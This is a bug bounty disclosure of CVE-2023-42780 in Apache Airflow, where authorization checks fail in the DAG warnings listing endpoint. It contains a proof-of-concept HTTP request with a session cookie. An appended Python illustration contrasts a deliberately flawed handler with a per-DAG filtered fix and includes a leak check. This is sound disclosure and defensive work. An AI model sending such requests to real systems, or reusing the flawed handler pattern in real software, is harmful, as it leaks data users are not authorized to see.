hackerone Balis0ng H1:2208647
History: Oct 13, 2023 - 4:39 p.m.

Internet Bug Bounty: CVE-2023-42780: Apache Airflow: Improper access control vulnerability in the "List dag warnings" feature

2023-10-13 16:39:59
balis0ng
hackerone.com
$540
18
apache airflow
security vulnerability
list dag warnings
unauthorized access
dags
import errors
bug bounty
low severity

AI Score: 6.9 Medium (Confidence: Low)
EPSS: 0.0004 Low (Percentile: 16.0%)

Apache Airflow, versions prior to 2.7.2, contains a security vulnerability that allows authenticated users of Airflow to list warnings for all DAGs, even if the user had no permission to see those DAGs. It would reveal the dag_ids and the stack-traces of import errors for those DAGs with import errors.

Steps to reproduce:

  1. Here I create a role with very little permission. It only has read permissions for the DAG “example_setup_teardown_taskflow” and read warning permissions.
  2. Assign the role to an account and log in.
  3. Use Burp Suite to send the following message, and you can see the warnings of other DAGs. (replaced with the session of the account)

```
GET /api/v1/dagWarnings HTTP/1.1
Host: testvul.com:8080
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
content-type: application/json
Referer: http://testvul.com:8080/dags/example_external_task_marker_parent/grid
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=6ba0ebcd-94b6-41e9-8143-2ada52d554b1.IGPZy1m5c8235p5r8qo4GhPl_YM
Connection: close
Content-Length: 0
```



Security Advisory: https://lists.apache.org/thread/h5tvsvov8j55wojt5sojdprs05oby34d

**Severity**: Low

Credit: balis0ng

Impact

It allows authenticated users of Airflow to list warnings for all DAGs, even if the user had no permission to see those DAGs. It would reveal the dag_ids and the stack-traces of import errors for those DAGs with import errors.
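The access-control gap described in this report, as an added illustration (a simplified model, not Apache Airflow's code and not part of the original report): a list handler that checks only the collection-level "read warnings" permission, beside one that also filters by the DAGs the role may read, plus a regression check for responses. The `Role` and `DagWarning` classes, the function names, and every DAG id other than `example_setup_teardown_taskflow` are assumptions made for the example.

```python
# Added illustration: a simplified model, not Apache Airflow's source code.
from dataclasses import dataclass, field


@dataclass(frozen=True)
class DagWarning:          # hypothetical stand-in for one warning record
    dag_id: str
    message: str


@dataclass
class Role:                # hypothetical stand-in for a role's permissions
    can_read_warnings: bool
    readable_dag_ids: set = field(default_factory=set)


# Constructed sample data: the DAG named in the report plus two made-up ones.
WARNINGS = [
    DagWarning("example_setup_teardown_taskflow", "constructed warning A"),
    DagWarning("finance_export", "constructed warning B"),
    DagWarning("hr_sync", "constructed warning C"),
]
LOW_PRIV = Role(can_read_warnings=True,
                readable_dag_ids={"example_setup_teardown_taskflow"})


def list_warnings_collection_check_only(role, warnings):
    """Flawed pattern: only the collection-level permission is checked."""
    if not role.can_read_warnings:
        raise PermissionError("role lacks the read-warning permission")
    return list(warnings)


def list_warnings_per_dag_filtered(role, warnings, dag_id=None):
    """Hardened pattern: also require read permission on each warning's DAG."""
    if not role.can_read_warnings:
        raise PermissionError("role lacks the read-warning permission")
    if dag_id is not None and dag_id not in role.readable_dag_ids:
        raise PermissionError(f"role cannot read DAG {dag_id!r}")
    return [w for w in warnings
            if w.dag_id in role.readable_dag_ids
            and (dag_id is None or w.dag_id == dag_id)]


def leaked_dag_ids(role, returned):
    """Regression check: DAG ids in a response that the role may not read."""
    return sorted({w.dag_id for w in returned} - role.readable_dag_ids)


if __name__ == "__main__":
    print(leaked_dag_ids(LOW_PRIV, list_warnings_collection_check_only(LOW_PRIV, WARNINGS)))
    print(leaked_dag_ids(LOW_PRIV, list_warnings_per_dag_filtered(LOW_PRIV, WARNINGS)))
```

The same `leaked_dag_ids` comparison can be run against a real response after upgrading, using the restricted role's own session and its known set of readable DAGs.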
